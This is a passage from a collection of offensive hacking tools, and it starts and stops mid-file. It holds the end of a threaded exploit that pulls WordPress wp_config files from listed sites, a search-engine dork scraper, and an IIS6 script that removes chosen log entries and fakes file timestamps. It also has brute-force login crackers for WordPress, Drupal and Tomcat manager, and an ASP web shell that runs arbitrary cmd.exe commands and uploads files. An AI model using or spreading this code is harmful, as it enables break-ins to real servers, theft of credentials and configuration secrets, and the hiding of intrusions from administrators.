e: 52 | logger.error("[%s] %s",url,e) 53 | #print "Therer was an error: %s" % e 54 | except urllib2.URLError, e: 55 | logger.error("[%s] %s", url,e.reason) 56 | #print "Therer was an error: %s" % e.reason 57 | 58 | def run(self): 59 | while True: 60 | #Get from queue job 61 | host = self.queue.get() 62 | if host: 63 | line = host.strip() 64 | line = line.strip('\n') 65 | site = urlparse.urlparse(line) 66 | name= savepath + site.hostname + '__wp_config.txt' 67 | path = line + payload 68 | self.exp(path,name) 69 | #print self.getName() + ":" + host 70 | self.queue.task_done() 71 | 72 | 73 | 74 | 75 | if __name__ == '__main__': 76 | if os.path.exists(savepath) == False: 77 | os.makedirs( savepath, mode=0777) 78 | start = time.time() 79 | 80 | #Create number process 81 | for i in range(n_thread): 82 | t = ThreadProcess(queue) 83 | t.setDaemon(True) 84 | t.start() 85 | #url list 86 | fr = open('url.txt','r') 87 | for line in fr: 88 | queue.put(line) 89 | queue.join() 90 | fr.close() 91 | end = time.time() 92 | print "It takes about - %.2fs" % (end-start) 93 | 94 | 95 | 96 | 97 | 98 | 99 | -------------------------------------------------------------------------------- /py/google_result.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | #author:youstar 4 | #email:youstar#foxmail.com 5 | import sys,os,urllib,urllib2,string 6 | import re 7 | from htmlentitydefs import name2codepoint 8 | from BeautifulSoup import BeautifulSOAP 9 | 10 | #get domain 11 | def getdomain(url): 12 | patter = 'http(s)?://([\w-]+\.)+[\w-]+' 13 | m = re.match(patter,url) 14 | if m is not None: 15 | return m.group() 16 | #url decode 17 | def html_unescape(str): 18 | def entity_replacer(m): 19 | entity = m.group(1) 20 | if entity in name2codepoint: 21 | return unichr(name2codepoint[entity]) 22 | else: 23 | return m.group(0) 24 | def ascii_replacer(m): 25 | cp = int(m.group(1)) 26 | if cp <= 255: 27 | return unichr(cp) 28 | else: 29 | return m.group(0) 30 | 31 | s = re.sub(r'&#(\d+);', ascii_replacer, str, re.U) 32 | return re.sub(r'&([^;]+);', entity_replacer, s, re.U) 33 | #write to file 34 | #---------------------------------------------------------------------- 35 | def writetofile(filename,urltitle): 36 | hfile = open(filename,'w') 37 | for key in urltitle.keys(): 38 | lineurl = "%s\r\n"%(urltitle[key]) 39 | hfile.writelines(lineurl) 40 | hfile.close 41 | #get url link form the result 42 | def geturladdress(keywords,type,number,filename): 43 | urltitle = {} 44 | pageid = string.atoi(number)/100 45 | for idpage in range(0,pageid,1): 46 | entirehtml= getresponse(keywords,type,idpage*100) 47 | soup = BeautifulSOAP(entirehtml) 48 | results = soup.findAll('li', {'class': 'g'}) 49 | for result in results: 50 | title_a = result.find('a') 51 | if not title_a: 52 | continue 53 | else: 54 | title = ''.join(title_a.findAll(text=True)) 55 | title = html_unescape(title) 56 | #print title 57 | url = title_a['href'] 58 | #print url 59 | url = getdomain(url) 60 | urltitle[title]= url 61 | writetofile(filename,urltitle) 62 | #get the response html 63 | def getresponse(keywords,type,number=0): 64 | if type == "google": 65 | data = {} 66 | data['q'] = keywords 67 | data['start'] = number 68 | data['num'] = 100 69 | EnData = urllib.urlencode(data) 70 | #print EnData 71 | ggurl = "http://www.google.com.hk/search" 72 | fullurl = ggurl + "?" + EnData 73 | #print fullurl 74 | ggrequest = urllib2.Request(fullurl) 75 | ggrequest.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)') 76 | ggresponse = urllib2.urlopen(ggrequest) 77 | html = ggresponse.read() 78 | print html 79 | return html 80 | elif type == "baidu": 81 | data = {} 82 | data['wd']=keywords 83 | EnData = urllib.urlencode(data) 84 | baiduurl= "http://www.baidu.com/s?" 85 | fullurl = baiduurl + EnData 86 | print fullurl 87 | bdresponse = urllib2.urlopen(fullurl) 88 | html = bdresponse.read() 89 | return html 90 | else: 91 | print 'please input the right format' 92 | if __name__=="__main__": 93 | if len(sys.argv)!= 5: 94 | print 'please input the right format' 95 | print 'expamle: spidersearch.py keywords google 3000 export.txt' 96 | else: 97 | keywords = sys.argv[1] 98 | type = sys.argv[2] 99 | number = sys.argv[3] 100 | filename = sys.argv[4] 101 | print 'waiting.....' 102 | geturladdress(keywords,type,number,filename) 103 | print 'success.....' 104 | -------------------------------------------------------------------------------- /vbs/iis6_remove_log.vbs: -------------------------------------------------------------------------------- 1 | If WScript.Arguments.Count < 1 Then 2 | Usage() 3 | WScript.Quit(1) 4 | End If 5 | 6 | Select Case UCase(WScript.Arguments.Item(0)) 7 | Case "LIST" 8 | Call ListWeb() 9 | Case "STOPLOG" 10 | Call SetLog(WScript.Arguments.Item(1),0) '0 stop log 11 | Case "STARTLOG" 12 | Call SetLog(WScript.Arguments.Item(1),1) '1 start log 13 | Case "DELLOG" 14 | Call DelLog(WScript.Arguments.Item(1),WScript.Arguments.Item(2),WScript.Arguments.Item(3)) 15 | Case Else 16 | Call Usage() 17 | End Select 18 | 19 | Sub Usage() 20 | WScript.Echo "IIS 6 Log Deleter By. Twi1ight" & vbCrLf 21 | WScript.Echo "Usage:" & vbTab & _ 22 | WScript.ScriptName & " LIST" & vbCrLf & vbTab & _ 23 | WScript.ScriptName & " STARTLOG SiteID" & vbCrLf & vbTab & _ 24 | WScript.ScriptName & " STOPLOG SiteID" & vbCrLf & vbTab & _ 25 | WScript.ScriptName & " DELLOG SiteID LogFile KeyString" & vbCrLf & " " & _ 26 | "LIST" & vbTab & vbTab & "List all websites info" & vbCrLf & " " & _ 27 | "STARTLOG" & vbTab & "Start IIS Logging on SiteID" & vbCrLf & " " & _ 28 | "STOPLOG" & vbTab & "Stop IIS Logging on SiteID" & vbCrLf & " " & _ 29 | "DELLOG" & vbTab & "Automatical stop/start IIS log and delete log items which contains KeyString, KeyString is a Regular String" 30 | 31 | End Sub 32 | 33 | Sub CheckID(ID) 34 | If Not IsNumeric(ID) Then 35 | WScript.Echo "[-] The site ID specified is not Numeric" 36 | WScript.Quit(1) 37 | End If 38 | End Sub 39 | 40 | Sub ListWeb() 41 | Set ObjService=GetObject("IIS://LocalHost/W3SVC") 42 | For Each obj3w In objservice 43 | If IsNumeric(obj3w.Name) Then 44 | sServerName=Obj3w.ServerComment 45 | Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root") 46 | ListAllWeb = ListAllWeb & obj3w.Name & _ 47 | String(Abs(25-Len(obj3w.Name))," ") & _ 48 | obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf 49 | Set objLog = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name) 50 | ListAllWeb = ListAllWeb & String(25," ") & _ 51 | "Log: " & objLog.LogFileDirectory & "\W3SVC" & obj3w.Name &vbCrLf 52 | End If 53 | Next 54 | WScript.Echo ListAllWeb 55 | Set ObjService=Nothing 56 | End Sub 57 | 58 | Sub SetLog(ID, value) 59 | CheckID(ID) 60 | str = "Start" 61 | If value = 0 Then 62 | str = "Stop" 63 | End If 64 | Set objSite = GetObject("IIS://localhost/W3SVC/" & ID) 65 | objSite.Put "LogType",value 66 | objSite.SetInfo 67 | If (Err.Number <> 0) Then 68 | Err.Clear 69 | WScript.Echo "[-] Error Trying To " & str & " IIS Logging!" 70 | Else 71 | WScript.Echo str & " IIS Logging Success!" 72 | End If 73 | 74 | End Sub 75 | 76 | Sub DelLog(ID, LogFile, KeyString) 77 | On Error Resume Next 78 | Const ForReading = 1, ForWriting = 2, ForAppending = 8 79 | 'WScript.Echo "Delete Log File" 80 | 'Stop Log 81 | Call SetLog(ID, 0) 82 | WScript.Sleep 500 'wait iis to stop log otherwise will raise an exception if rewrite logfile immediately 83 | Set regEx = New RegExp 84 | regEx.Pattern = KeyString 85 | regEx.IgnoreCase = True 86 | 87 | Set fso = CreateObject("Scripting.FileSystemObject") 88 | 'Save Last Modify Time 89 | Set f = fso.GetFile(LogFile) 90 | modifyDate = f.DateLastModified 91 | 'WScript.Echo f.DateCreated & " " & f.DateLastAccessed & " " & f.DateLastModified 92 | 93 | LogPath = fso.GetParentFolderName(LogFile) 94 | LogName = fso.GetFileName(LogFile) 95 | TempFile = fso.GetTempName 96 | SrcFile = LogPath & "\" & TempFile 97 | 98 | 'WScript.Echo TempFile 99 | Call fso.CopyFile(LogFile, SrcFile) 100 | Set srcLog = fso.OpenTextFile(SrcFile, ForReading, False) 101 | Set dstLog = fso.OpenTextFile(LogFile, ForWriting, False) 102 | Do While srcLog.AtEndOfLine <> True 103 | line = srcLog.ReadLine 104 | Set Martches = regEx.Execute(line) 105 | If Martches.Count <> 0 Then 106 | WScript.Echo " "& line 'comment out this line if don't like to display deleted log item 107 | Else 108 | dstLog.WriteLine(line) 109 | End If 110 | Loop 111 | srcLog.Close 112 | dstLog.Close 113 | fso.DeleteFile(SrcFile) 114 | 'Change Last Modify Time 115 | Set objShell = CreateObject("Shell.Application") 116 | Set objFolder = objShell.NameSpace(LogPath) 117 | Set objFolderItem = objFolder.ParseName(LogName) 118 | objFolderItem.ModifyDate = modifyDate 119 | 'WScript.Echo f.DateCreated & " " & f.DateLastAccessed & " " & f.DateLastModified 120 | If (Err.Number <> 0) Then 121 | WScript.Echo "[-] Error Trying To Delete IIS Log!" 122 | Err.Clear 123 | End If 124 | 'Start Log 125 | Call SetLog(ID, 1) 126 | End Sub 127 | -------------------------------------------------------------------------------- /php/wp_login_bruteforce.php: -------------------------------------------------------------------------------- 1 | <?php 2 | 3 | function get_user() 4 | { 5 | global $host, $path; 6 | $authors = array(); 7 | if ($path == "") $url="http://$host/?feed=rss2"; 8 | $url = "http://$host/$path/?feed=rss2"; 9 | if (@fopen($url, 'r')) { 10 | $res = send_pack($url, 0); 11 | if (preg_match_all('/<dc:creator><\!\[CDATA\[(.*?)\]\]><\/dc:creator>/', $res, $authors)) { 12 | $authors = array_unique($authors[1]); 13 | } else if (preg_match_all('/<dc:creator>(.*?)<\/dc:creator>/', $res, $authors)) { 14 | $authors = array_unique($authors[1]); 15 | } 16 | } else { 17 | for ($i = 1; $i <= 5; $i++) { 18 | $url = "http://$host/$path/?author=$i"; 19 | $res = send_pack($url, 0); 20 | preg_match('/title=\'(.*?)\' rel=\'me\'/i', $res, $users); 21 | $authors[] = $users[1]; 22 | $authors = array_filter($authors); 23 | } 24 | } 25 | return $authors; 26 | } 27 | 28 | 29 | function crack_login($user_arr, $pass_arr) 30 | { 31 | global $host, $path; 32 | if ($path == "") $url="http://$host/wp-login.php"; 33 | $url = "http://$host/$path/wp-login.php"; 34 | $cracked = array(); 35 | foreach ($user_arr as $user) { 36 | echo "current crack user --> ".$user."\n\n"; 37 | $user = iconv('utf-8', 'gbk//IGNORE', $user); 38 | if ($pass_arr == 'same') { 39 | //$post = "log=" . urlencode($user) . "&pwd=" . urlencode($user) . "&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=" . urlencode("http://$host/$path/") . "%2Fwp-admin%2F&testcookie=1"; 40 | $post = "log=" . urlencode($user) . "&pwd=" . urlencode($user) . "&wp-submit=Log+In&redirect_to=" . urlencode("http://$host/$path/") . "%2Fwp-admin%2F&testcookie=1"; 41 | sleep(10); 42 | $res = send_pack($url, $post); 43 | if (strpos($res, 'div id="login_error"') === false) { 44 | echo 'Username :' . $user . ' Password :' . $user . "\n\n"; 45 | $cracked[] = $user; 46 | } 47 | } else { 48 | $pass_arr = array_unique($pass_arr); 49 | foreach ($pass_arr as $pass) { 50 | $pass = trim($pass); 51 | //$post = "log=" . urlencode($user) . "&pwd=" . urlencode($pass) . "&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1"; 52 | $post = "log=" . urlencode($user) . "&pwd=" . urlencode($pass) . "&wp-submit=Log+In&redirect_to=" . urlencode("http://$host/$path/") . "%2Fwp-admin%2F&testcookie=1"; 53 | sleep(10); 54 | $res = send_pack($url, $post); 55 | //fwrite(fopen('a.txt','w'),$res);exit; 56 | if (strpos($res, 'div id="login_error"') === false) { 57 | echo 'Username :' . $user . ' Password :' . $pass . "\n\n"; 58 | } 59 | } 60 | } 61 | } 62 | return $cracked; 63 | } 64 | 65 | function send_pack($url, $post) 66 | { 67 | $ch = curl_init(); 68 | curl_setopt($ch, CURLOPT_URL, $url); 69 | curl_setopt($ch, CURLOPT_HEADER, 0); 70 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 71 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 72 | curl_setopt($ch, CURLOPT_HTTPHEADER, array( 73 | 'User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:27.0) Gecko/20100101 Firefox/27.0;by DarkR4y', 74 | 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 75 | 'Accept-Language: en-US,en;q=0.5' 76 | )); 77 | curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:8888'); //set proxy 78 | if ($post) { 79 | curl_setopt($ch, CURLOPT_POST, 1); 80 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post); 81 | } 82 | $response = curl_exec($ch); 83 | curl_close($ch); 84 | return $response; 85 | } 86 | 87 | 88 | function func_time() 89 | { 90 | list($microsec, $sec) = explode(' ', microtime()); 91 | return $microsec + $sec; 92 | } 93 | 94 | 95 | function load_dict() 96 | { 97 | $a = array(); 98 | $f = fopen('user.txt','r'); 99 | while (!feof($f)) { 100 | $a[] = str_replace(array("\n","\r"),"",fgets($f, 1024)); 101 | } 102 | fclose($f); 103 | return $a; 104 | } 105 | 106 | //=========================main================================== 107 | if ($argc < 4) { 108 | print_r(' 109 | +------------------------------------------------------+ 110 | Useage: php ' . $argv[0] . ' host path attack-mode 111 | Host: target server (ip/hostname) 112 | Path: path of wordpress 113 | Nuberic: 1 for same as usr | 2 for pass dict 114 | Example: php ' . $argv[0] . ' localhost /wordpress 1 115 | Example: php ' . $argv[0] . ' localhost /wordpress 2 116 | user.txt for log dict & pass.txt for pwd dict 117 | +------------------------------------------------------+ 118 | '); 119 | exit; 120 | } 121 | $start_time = func_time(); 122 | set_time_limit(0); 123 | error_reporting(7); 124 | if (!extension_loaded('curl')) { 125 | exit('plz enable CURL extention!'); 126 | } 127 | $host = $argv[1]; 128 | $path = $argv[2]; 129 | $type = $argv[3]; 130 | $auth = array(); 131 | //$auth = load_dict(); 132 | $auth = file('user.txt'); 133 | //exit(var_dump($auth)); 134 | 135 | echo 'count(Username): ' . count($auth) . "\n\n"; 136 | //print_r($auth); 137 | if ($type == 1) 138 | { 139 | echo 'Cracking => the password same as username' . "\n\n"; 140 | $cracked = crack_login($auth, 'same'); 141 | }elseif($type == 2) 142 | { 143 | $passwords = file('pass.txt'); 144 | echo 'Cracking => password dict attack' . "\n\n"; 145 | if ($cracked) { 146 | $auth = array_diff($auth, $cracked); 147 | } 148 | crack_login($auth, $passwords); 149 | }else 150 | { 151 | echo "invalid attack mode!\n\n"; 152 | exit(); 153 | } 154 | 155 | echo 'elapsed time: ' . round((func_time() - $start_time), 4) . 's'; 156 | ?> 157 | -------------------------------------------------------------------------------- /py/drupal_bruterforce.py: -------------------------------------------------------------------------------- 1 | """ 2 | Drupalbrute.py 3 | 4 | Author: Justin C. Klein Keane <justin@madirish.net> 5 | 6 | """ 7 | import urllib, urllib2 8 | import sys, getopt 9 | 10 | from urllib2 import Request, urlopen, URLError, HTTPError 11 | 12 | global maxrange, target, wordlist, userlist, usernames, passwords, version 13 | passwords = [] 14 | usernames = [] 15 | maxrange = 3 16 | version = 5 17 | 18 | def handle_args(): 19 | global target, wordlist, maxrange, userlist, version 20 | try: 21 | opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "number=", "wordlist=", "target=", "userlist=", "version="]) 22 | except getopt.GetoptError, err: 23 | # print help information and exit: 24 | print str(err) # will print something like "option -a not recognized" 25 | usage() 26 | sys.exit(2) 27 | for o, a in opts: 28 | if o in ("-h", "--help"): 29 | usage() 30 | sys.exit() 31 | elif o in ("-n", "--number"): 32 | maxrange = int(a) 33 | elif o == "--target": 34 | target = a 35 | elif o == "--wordlist": 36 | wordlist = a 37 | elif o == "--userlist": 38 | userlist = a 39 | elif o == "--version": 40 | version = a 41 | else: 42 | assert False, "unhandled option" 43 | 44 | # set up defaults 45 | try: 46 | target 47 | except NameError: 48 | target = 'None' 49 | if target == 'None': 50 | print "You must specify a target!" 51 | usage() 52 | sys.exit() 53 | 54 | try: 55 | wordlist 56 | except NameError: 57 | wordlist = 'None' 58 | if wordlist == 'None': 59 | print "You must specify a wordlist!" 60 | usage() 61 | sys.exit() 62 | 63 | try: 64 | userlist 65 | except NameError: 66 | userlist = 'None' 67 | 68 | def usage(): 69 | print "Usage: drupalbrute.py [--number=max number of user ids] [--target=target URL] [--wordlist=file] [--userlist=file] [--version=6 (5 is default)]" 70 | 71 | def read_passwords(): 72 | global wordlist, passwords 73 | f = open(wordlist, 'r') 74 | for line in f: 75 | passwords.append(line) 76 | if len(passwords) == 0: 77 | usage() 78 | sys.exit() 79 | 80 | def read_userlist(): 81 | global userlist, passwords 82 | f = open(userlist, 'r') 83 | for line in f: 84 | usernames.append(line.strip()) 85 | if len(usernames) == 0: 86 | usage() 87 | sys.exit() 88 | 89 | def discover_users(): 90 | global target, usernames, maxrange 91 | for i in range(1,maxrange): 92 | try: 93 | target 94 | except NameError: 95 | target = 'None' 96 | 97 | if target == 'None': 98 | usage() 99 | sys.exit() 100 | url = target + "/?q=user/" 101 | request_url = url + str(i) 102 | try: 103 | #print "Trying " + request_url 104 | response = urllib2.urlopen(request_url) 105 | the_page = response.read() 106 | uname_start = the_page.find('User account</a></div>') 107 | uname_start = the_page.find('<h2>', uname_start) + 4 108 | if uname_start > 17: 109 | uname_end = the_page.find('</h2>', uname_start) 110 | #print the_page[uname_start:uname_end] 111 | usernames.append(the_page[uname_start:uname_end]) 112 | except HTTPError, e: 113 | error = 'Error at ' + request_url + ' ' + str(e.code) 114 | 115 | handle_args() 116 | read_passwords() 117 | if (userlist == 'None'): 118 | discover_users() 119 | else: 120 | read_userlist() 121 | print "Please wait, working..." 122 | 123 | # Brute force the account 124 | if version < 6: 125 | if len(usernames) > 0: 126 | for user in usernames: 127 | for passw in passwords: 128 | data = { 129 | 'name': user, 130 | 'pass': passw, 131 | 'form_id': 'user_login' 132 | } 133 | urldata = urllib.urlencode(data) 134 | url = target + "/?q=user" 135 | results = urllib.urlopen(url, urldata).read() 136 | if results.find('Sorry, unrecognized username or password.') == -1: 137 | print user + ":" + passw.strip() 138 | else: 139 | print "Drupal 6" 140 | # get a copy of the form first 141 | url = target + "/?q=user" 142 | formid = '' 143 | try: 144 | response = urllib2.urlopen(url) 145 | the_page = response.read() 146 | formid_start = the_page.find('name="form_build_id"') 147 | if (formid_start < 0): 148 | print "Sorry, can't find form_build_id field" 149 | sys.exit() 150 | formid_start += 25 151 | formid = the_page[formid_start:formid_start+37] 152 | except HTTPError, e: 153 | error = 'Error at ' + request_url + ' ' + str(e.code) 154 | if len(usernames) > 0: 155 | for user in usernames: 156 | print "Cracking ... " + user 157 | for passw in passwords: 158 | data = { 159 | 'name': user, 160 | 'pass': passw, 161 | 'form_build_id': formid, 162 | 'form_id': 'user_login', 163 | 'op': 'Log in' 164 | } 165 | urldata = urllib.urlencode(data) 166 | url = target + "/?q=user" 167 | results = urllib.urlopen(url, urldata).read() 168 | if results.find('Sorry, unrecognized username or password.') == -1: 169 | print user + ":" + passw.strip() 170 | -------------------------------------------------------------------------------- /py/tomcat_crack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # Functions: Idenfy tomcat password 4 | # Code By BlAck.Eagle 5 | 6 | import threading, time, random, sys, urllib2, httplib, base64 7 | from copy import copy 8 | import re 9 | from collections import defaultdict, deque 10 | 11 | 12 | class Tomcatbrute(threading.Thread): 13 | def __init__(self,server,port,path,user,password): 14 | threading.Thread.__init__(self) 15 | self.host = str(server) 16 | self.port = str(port) 17 | self.path = str(path) 18 | self.user = str(user) 19 | self.password = str(password) 20 | self.userAgent = "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" 21 | 22 | 23 | def writeresult(self,record): 24 | fp = open('Result.html','a+') 25 | fp.writelines(record+'') 26 | fp.close() 27 | 28 | def run(self): 29 | #union = self.user+':'+self.password 30 | auth = base64.b64encode('%s:%s' % (self.user, self.password)).replace('\n', '') 31 | #flag = Verificate.HttpRequest().verificate(self.host,self.port,self.path) 32 | #if (flag): 33 | #print 'This is a Tomcat!' 34 | #print base64.b64encode(union) 35 | 36 | print self.getName(), "-- created." 37 | 38 | try: 39 | h = httplib.HTTP(self.host,self.port) 40 | h.putrequest('GET', self.path) 41 | 42 | h.putheader('Host', self.host+':'+self.port) 43 | h.putheader('User-agent', self.userAgent) 44 | h.putheader('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8') 45 | h.putheader('Accept-Language','en-us') 46 | h.putheader('Accept-Encoding','gzip, deflate') 47 | 48 | 49 | #h.putheader('Authorization', 'Basic %s' % base64.b64encode(union)) 50 | h.putheader('Authorization', 'Basic %s' %auth) 51 | #print auth 52 | h.endheaders() 53 | 54 | statuscode, statusmessage, headers = h.getreply() 55 | #print "Response: ", statuscode, statusmessage 56 | #print "Headers: ", headers 57 | #print data 58 | #print headers['Authorization'] 59 | #print response.read() 60 | #print response.status 61 | #print statuscode 62 | print headers['Server'] 63 | 64 | if (re.findall(r'Coyote',headers['Server'])): 65 | if statuscode==200: 66 | print headers['Server'] 67 | print "\t\n[OK]Username:",self.user,"Password:",self.password,"\n" 68 | self.writeresult(self.host+":"+self.user+":"+self.password+"\n") 69 | else: 70 | print "\t\nThis is not Tomcat\n" 71 | else: 72 | pass 73 | #print "\t\n[X]Wrong username or password!\n" 74 | except : 75 | #print "An error occurred:", msg 76 | pass 77 | def timer(): 78 | now = time.localtime(time.time()) 79 | return time.asctime(now) 80 | 81 | 82 | 83 | if __name__ == '__main__': 84 | if len(sys.argv) !=5: 85 | print "\nUsage: ./TomcatBrute.py <urlList> <port> <userlist> <wordlist>\n" 86 | print "ex: python TomcatBrute.py ip.txt 8080 users.txt wordlist.txt\n" 87 | sys.exit(1) 88 | 89 | try: 90 | users = open(sys.argv[3], "r").readlines() 91 | except(IOError): 92 | print "Error: Check your userlist path\n" 93 | sys.exit(1) 94 | 95 | try: 96 | words = open(sys.argv[4], "r").readlines() 97 | except(IOError): 98 | print "Error: Check your wordlist path\n" 99 | sys.exit(1) 100 | 101 | try: 102 | port = sys.argv[2] 103 | except(IOError): 104 | print "Error: Check your port\n" 105 | 106 | path = '/manager/html' 107 | 108 | WEAK_USERNAME = [p.replace('\n','') for p in users] 109 | WEAK_PASSWORD = [p.replace('\n','') for p in words] 110 | #WEAK_USERNAME = ['tomcat','user'] 111 | #WEAK_PASSWORD = ['tomcat','user'] 112 | accounts =deque() #list数组 113 | 114 | for username in WEAK_USERNAME: 115 | for password in WEAK_PASSWORD: 116 | accounts.append((username,password)) 117 | 118 | #print len(accounts) 119 | #server = sys.argv[1] 120 | 121 | 122 | 123 | host_open = open(sys.argv[1], 'r') 124 | ip = [p.replace('\n','') for p in host_open] 125 | for server in ip: 126 | print "[+] Server:",server 127 | print "[+] Port:",port 128 | print "[+] Users Loaded:",len(WEAK_USERNAME) 129 | print "[+] Words Loaded:",len(WEAK_PASSWORD) 130 | print "[+] Started",timer(),"\n" 131 | 132 | for I in range(len(accounts)): 133 | work = Tomcatbrute(server,port,path,accounts[I][0],accounts[I][1]) 134 | work.setDaemon(1) 135 | work.start() 136 | time.sleep(0.1) 137 | print "\n[-] Done -",timer(),"\n" 138 | -------------------------------------------------------------------------------- /vbs/cmd.asp.vbs: -------------------------------------------------------------------------------- 1 | <%@ Language="VBScript" %> 2 | <% 3 | Dim theComponent(7) 4 | theComponent(0) = "Scripting.FileSystemObject" 5 | theComponent(1) = "WScript.Shell" 6 | theComponent(2) = "WScript.Shell.1" 7 | theComponent(3) = "WScript.Network" 8 | theComponent(4) = "WScript.Network.1" 9 | theComponent(5) = "shell.application" 10 | theComponent(6) = "shell.application.1" 11 | Function IsObjInstalled(strClassString) 12 | On Error Resume Next 13 | IsObjInstalled = False 14 | Err = 0 15 | Dim xTestObj 16 | Set xTestObj = Server.CreateObject(strClassString) 17 | If -2147221005 <> Err Then 18 | IsObjInstalled = True 19 | Else 20 | IsObjInstalled = False 21 | End if 22 | Set xTestObj = Nothing 23 | Err = 0 24 | End Function 25 | %> 26 | <tr><td>支持组件:</td></tr> 27 | <% 28 | Dim i 29 | For i=0 to UBound(theComponent)-1 30 | If IsObjInstalled(theComponent(i)) Then 31 | Response.Write "<tr><td>" & theComponent(i) & "</td><td><font color=""green"">√</font></td></tr>" & vbCrLf 32 | Else 33 | Response.Write "<tr><td>" & theComponent(i) & "</td><td><font color=""red"">×</font></td></tr>" & vbCrLf 34 | End if 35 | Next 36 | %> 37 | 38 | 39 | 40 | <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> 41 | <object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> 42 | <% 43 | sub ShowErr() 44 | If Err Then 45 | jb"<a href='javascript:history.back()'>" & Err.DescrIption & "</a>" 46 | Err.Clear:Response.Flush 47 | ENd IF 48 | End SUB 49 | function jb(Str) 50 | Response.WRItE(Str) 51 | END function 52 | Sub mbd(Str) 53 | execute(Str) 54 | END Sub 55 | Function rePATH(S) 56 | REpath=REpLAcE(s,"\","\\") 57 | ENd Function 58 | FuNctIon RRepaTh(S) 59 | RREpaTH=rEplAcE(S,"\\","\") 60 | end fUncTion 61 | Url=REQueSt.sErVErvARiables("URL") 62 | nimajbm=requESt.sErVeRVArIABlEs("LOCAL_ADDR") 63 | AcTIoN=ReQUESt("Action") 64 | RooTpATH=SeRveR.mAPpaTH(".") 65 | WWWROOt=SErVER.MAppATH("/") 66 | sba=request.servervariables("http_host") 67 | appbd=rEQUEsT.seRvErVARIaBLES("PATH_INFO") 68 | FOLdErpAth=REqueSt("FolderPath") 69 | ScrName=Request.ServerVariables("Script_Name") 70 | fNAME=reQUesT("FName") 71 | ServerU=ReQueST.SERVervaRIables("http_host") 72 | WoriNima=Request.ServerVariables("SERVER_NAME") 73 | O0O0=Request.ServerVariables("PATH_TRANSLATED") 74 | WoriNiba=Request.ServerVariables("SERVER_SOFTWARE") 75 | Worininai=Request.ServerVariables("LOCAL_ADDR") 76 | jbmc=Request.ServerVariables("NUMBER_OF_PROCESSORS") 77 | jbmb=Request.ServerVariables("OS") 78 | SI="<table border='0' cellpadding='0' cellspacing='0' align='center'>" 79 | SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>" 80 | SI=SI&"<tr><td>" 81 | SI=SI&"上传路径:<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\Cmd.exe")&"' size='40'>" 82 | SI=SI&" <input name='LocalFile' type='file' size='25'>" 83 | SI=SI&" <input type='submit' name='Submit' value='上传'>" 84 | SI=SI&"</td></tr></form></table>" 85 | on error resume next 86 | if request("sp")<>"" then session("shellpath") = request("sp") 87 | shellpath=session("shellpath") 88 | if shellpath="" then shellpath = "cmd.exe" 89 | if request("cmd")<>"" then session("defcmd") = request("cmd") 90 | defcmd=session("defcmd") 91 | if defcmd="" then defcmd="set" 92 | if request("rwpath")<>"" then session("rwpath") = request("rwpath") 93 | rwpath=session("rwpath") 94 | if rwpath="" then rwpath=server.mappath(".") 95 | si="<form method='post'>" 96 | rp1="<input type=""radio"" name=""cmdtype"" value=""" 97 | si=si&"cmd:<input name='sp' value='"&shellpath&"' style='width:35%'> 回显:<input name='rwpath' value='"&rwpath&"' style='width:35%'>" 98 | si=si&"<input type='hidden' name='action' value='Cmd1Shell'>" 99 | si=si&rp1&"wscript"" checked>wscript" 100 | si=si&rp1&"wscript.shell"">wscript.shell" 101 | si=si&rp1&"wscript.shell.1"">wscript.shell.1" 102 | si=si&rp1&"shell.application"">shell.application" 103 | si=si&rp1&"shell.application.1"">shell.application.1" 104 | si=si&"<input name='cmd' style='width:92%' value='"&defcmd&"'> <input type='submit' value='执行'>" 105 | 106 | set fso=server.createobject("scripting.filesystemobject") 107 | sztempfile = rwpath&"\cmd.txt" 108 | select case request("cmdtype") 109 | case "wscript" 110 | set cm=server.createobject("wscript.shell") 111 | set dd=cm.exec(shellpath&" /c "&defcmd) 112 | aaa=dd.stdout.readall 113 | si=si&"<text"&"area style='width:100%;height:440;' class='cmd'>" 114 | si=si&aaa 115 | si=si&chr(13)&"</text"&"area></form>" 116 | case "wscript.shell","wscript.shell.1" 117 | on error resume next 118 | set ws=server.createobject(request("cmdtype")) 119 | call ws.run (shellpath&" /c " & defcmd & " > " & sztempfile, 0, true) 120 | set ofilelcx = fso.opentextfile (sztempfile, 1, false, 0) 121 | aaa=server.htmlencode(ofilelcx.readall) 122 | ofilelcx.close 123 | call fso.deletefile(sztempfile, true) 124 | si=si&"<text"&"area style='width:100%;height:440;' class='cmd'>" 125 | si=si&aaa 126 | si=si&chr(13)&"</text"&"area></form>" 127 | case "shell.application","shell.application.1" 128 | set seshell=server.createobject(request("cmdtype")) 129 | 130 | seshell.ShellExecute shellpath," /c " & defcmd & " > " & sztempfile,"","open",0 131 | si=si&"<iframe id=cmdResult src='?cmdtype=shellresult&Action=Cmd1Shell' style='width:100%;height:440;'>" 132 | case "shellresult" 133 | response.Clear() 134 | on error resume next 135 | jb "<body style=""background:#3F8805""><span style=""color:#FFFFFF"">" 136 | if fso.fileexists(sztempfile)=true then 137 | set ofilelcx = fso.opentextfile (sztempfile, 1, false, 0) 138 